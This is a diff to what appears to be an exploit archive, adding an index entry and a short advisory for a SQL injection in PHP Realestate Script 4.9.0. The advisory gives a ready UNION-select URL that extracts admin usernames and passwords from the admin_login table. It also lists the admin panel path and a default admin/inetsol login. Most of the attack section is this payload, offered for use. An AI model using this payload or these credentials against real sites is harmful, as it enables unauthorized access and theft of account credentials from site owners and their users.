diff --git a/files.csv b/files.csv index ab798995e..7a3d477f5 100755 --- a/files.csv +++ b/files.csv @@ -36047,3 +36047,4 @@ id,file,description,date,author,platform,type,port 39861,platforms/multiple/dos/39861.txt,"Graphite2 - TtfUtil::CheckCmapSubtable12 Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 39862,platforms/multiple/dos/39862.txt,"Graphite2 - TtfUtil::CmapSubtable4NextCodepoint Heap-Based Overread",2016-05-26,"Google Security Research",multiple,dos,0 39863,platforms/multiple/dos/39863.txt,"Graphite2 - NameTable::getName Multiple Heap-Based Out-of-Bounds Reads",2016-05-26,"Google Security Research",multiple,dos,0 +39864,platforms/php/webapps/39864.txt,"PHP Realestate Script Script 4.9.0 - SQL Injection",2016-05-27,"Meisam Monsef",php,webapps,80 diff --git a/platforms/php/webapps/39864.txt b/platforms/php/webapps/39864.txt new file mode 100755 index 000000000..9d551055e --- /dev/null +++ b/platforms/php/webapps/39864.txt @@ -0,0 +1,16 @@ +# Exploit Title: Property Agent RealeState Script Sql Injection +# Date: 2015-05-27 +# Exploit Author: Meisam Monsef meisamrce@yahoo.com or meisamrce@gmail.com +# Vendor Homepage: +http://www.phpscriptsmall.com/product/php-realestate-script/ +# Version: 4.9.0 + +Exploit : +http://server/[path]/single.php?view_id=-99999+[SQl+Command] + +Test : +http://server/single.php?view_id=-57+/*!50000union*/+select+1,2,user_name,4,5,6,7,8,password,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26+from+admin_login + +Admin Panel : http://server/admin/ +Username : admin +Password : inetsol